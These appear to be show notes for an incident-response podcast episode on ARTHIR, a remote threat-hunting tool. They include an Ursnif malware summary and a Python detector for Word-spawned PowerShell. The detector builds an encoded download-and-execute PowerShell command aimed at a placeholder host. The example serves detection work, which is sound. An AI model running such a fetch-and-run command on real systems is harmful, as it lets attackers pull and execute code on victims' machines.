Formerly the Brakeing Down Incident Response Podcast
Recorded Sept 2019
TOPIC: ARTHIR - ATT&CK Remote Threat Hunting Incident Response tool
OUR GUEST WILL BE:
Olaf Hartong, Co-Founder Falcon Force
@olafhartong and @FalconForceTeam
Blog - https://medium.com/@olafhartong
Github - https://github.com/olafhartong/ThreatHunting
Website - https://www.falconforce.nl
OUR SPONSORS:
NEWS-WORTHY:
ISO Files via EMAIL???
https://blog.emsisoft.com/en/32373/beware-new-wave-of-malware-spreads-via-iso-file-email-attachments/
French Police take down Botnet
850,000 PCs involved - shuts down two-year-old Retadup malware operation
Over 10 billion malware attacks detected in 2018
https://www.techradar.com/news/over-10-billion-malware-attacks-detected-in-2018
New research from SonicWall has revealed that a record high of 10.52bn malware attacks occurred in 2018, indicating an escalation in the volume of cyberattacks as well as new targeted threat tactics used by cybercriminals.
91% Of Cyberattacks Start With A Phishing Email
According to a new report from PhishMe that found that 91% of cyberattacks start with a phish, the top reasons people are duped by phishing emails are curiosity (13.7%), fear (13.4%), and urgency (13.2%), followed by reward/recognition, social, entertainment, and opportunity.
GUEST Story - Dutch helped with Stuxnet
https://news.yahoo.com/revealed-how-a-secret-dutch-mole-aided-the-us-israeli-stuxnet-cyber-attack-on-iran-160026018.html
SITE-WORTHY:
Guest - LOLBAS
TOOL-WORTHY:
Ummm ARTHIR
MALWARE OF THE MONTH:
Ursnif
https://www.sentinelone.com/blog/ursnif-polymorphic-delivery-mechanism-explained/
https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/
This analysis lists the MITRE ATT&CK techniques used - very nice
SentinelOne did a good write up about it
Typical Word document delivery
Winword calling PowerShell - Always BAD
Base64 PowerShell executed - Always Bad
VBScript then downloads the payload
Stores it, where else, under the User directory structure
Mutates on download, so you won’t find the same hash if multiple users open the document
Key Detection points
AutoRuns of course, but created on shutdown like Dridex
So File and Registry auditing might help catch it on shutdown and boot up… there is a Cheat Sheet for that ;-)
Winword calling PowerShell
PowerShell Base64 encoding
Random named executable
Injects into the browsers
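The detection points above (Winword spawning PowerShell, a Base64 encoded PowerShell command line, a random-named executable dropped under the user profile) as detection logic run over process-creation events. This is an added example, not part of the show notes or of any tool discussed; the events are constructed in Sysmon Event ID 1 style and the decoded payload and paths are made up for illustration.

```python
import base64
import re

# Constructed Sysmon Event ID 1 style process-creation records, not real telemetry.
# The second event's -enc payload is built here from a UTF-16LE string, as powershell.exe expects.
_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
_ENC = base64.b64encode(_PAYLOAD.encode("utf-16-le")).decode("ascii")
WINWORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
EVENTS = [
    {"Image": WINWORD, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": '"WINWORD.EXE" Invoice_2019.docm'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": WINWORD,
     "CommandLine": "powershell.exe -NoP -W Hidden -enc " + _ENC},
    {"Image": r"C:\Users\alice\AppData\Roaming\xq7ktp2z.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"C:\Users\alice\AppData\Roaming\xq7ktp2z.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe"},
]

SCRIPT_HOSTS = ("powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe")
# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -en, -enc, ...).
_SWITCH = re.compile(r"(?:^|\s)[-/]([A-Za-z]+)(?:\s+|:)([A-Za-z0-9+/=]+)")

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if the line carries none."""
    for switch, value in _SWITCH.findall(cmdline):
        if "encodedcommand".startswith(switch.lower()):
            try:
                return base64.b64decode(value, validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None

def score_event(ev):
    """Return the names of the detections that fire on one process-creation event."""
    image, parent = ev["Image"].lower(), ev["ParentImage"].lower()
    hits = []
    if parent.endswith("winword.exe") and image.endswith(SCRIPT_HOSTS):
        hits.append("winword_spawns_script_host")
    if image.endswith("powershell.exe") and decode_encoded_command(ev["CommandLine"]) is not None:
        hits.append("powershell_encoded_command")
    if image.startswith("c:\\users\\") and image.endswith(".exe"):
        hits.append("exe_from_user_profile")  # what whitelisting the Users directory would block
    return hits

def hunt(events):
    """Map the command line of each suspicious event to the detections that fired on it."""
    return {ev["CommandLine"]: hits for ev in events if (hits := score_event(ev))}
```

Because the payload mutates on download, the hash is useless as a pivot; the parent-child relationship and the decoded command line are what stay constant across victims.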
PREVENTION
Scan email attachments
Block Macro execution
Application Whitelist Users directory
Lock down PowerShell
EDR
TOPIC OF THE DAY:
ARTHIR - ATT&CK Remote Threat Hunting Incident Response Tool
What is the problem ARTHIR is trying to solve?
It started as a way to run LOG-MD remotely and get back the reports without using an enterprise-type solution.
How do you run one or more of your favorite tools remotely against a system and get back the results?
During Incident Response, enabling WinRM on all machines is an easy GPO tweak; nothing to purchase, you already have it
It’s FREEEEeeeeeeee
What project was this forked from?
What improvements were added to make it ARTHIR?
Notes for MITRE ATT&CK Technique IDs
Scheduled task creation on remote systems running PS v2 thru v6
Push a binary to a folder other than the Kansa default C:\Windows
Cleanup module to delete the stuff you run, leave no trace
Run any binary tool you want and get back the native reports
Of course all the old Kansa capabilities
It is fairly easy to use
Why did you take this on and how did you solve the shortcomings of Kansa?
Shout-out to Olaf Hartong and Josh Ricard for their parts in this
Olaf on the report retrieval
Josh on the Schedule Task portion
Get back reports of utility or tool, in our case LOG-MD
Kansa only pulls back PowerShell console output
ARTHIR can return PS console output as Kansa did, or the native reports in the tool's own format. Kansa is also no longer supported by its creator.
What are the requirements for someone wanting to use ARTHIR in a domain and outside a domain?
Windows Remote Management or WinRM, aka PowerShell Remoting, which is built into all versions of Windows 7 and later
Uses the power of PowerShell v2 thru v5
Domain creds for Domain
Local creds with Authentication set to Negotiate for non-domain
What are some use cases for ARTHIR?
Incident Response obviously
Auditing
Threat Hunting
Configuration validation
Manual tweaks, security improvements
Remediation
A way to schedule one or more tasks of your favorite tools, like LOG-MD
Documentation?
WinRM guide
And how to use info too
With LOG-MD Professional you get a more detailed guide and all the modules for all the features of LOG-MD Professional; LOG-MD Consulting ships with LOG-MD Pro
Where do people get it?
You can find ARTHIR HERE:
Try it
Contribute
And MAP things to MITRE ATT&CK
Other Articles:
-------------------
Original Kansa Project